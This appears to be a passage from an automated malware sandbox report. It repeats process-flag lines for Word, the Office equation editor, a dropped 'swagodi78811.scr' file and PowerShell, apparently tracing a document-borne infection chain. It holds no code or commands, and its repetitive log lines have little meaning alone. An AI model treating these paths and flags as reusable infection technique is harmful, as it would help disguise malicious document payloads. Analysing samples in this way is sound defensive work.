                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
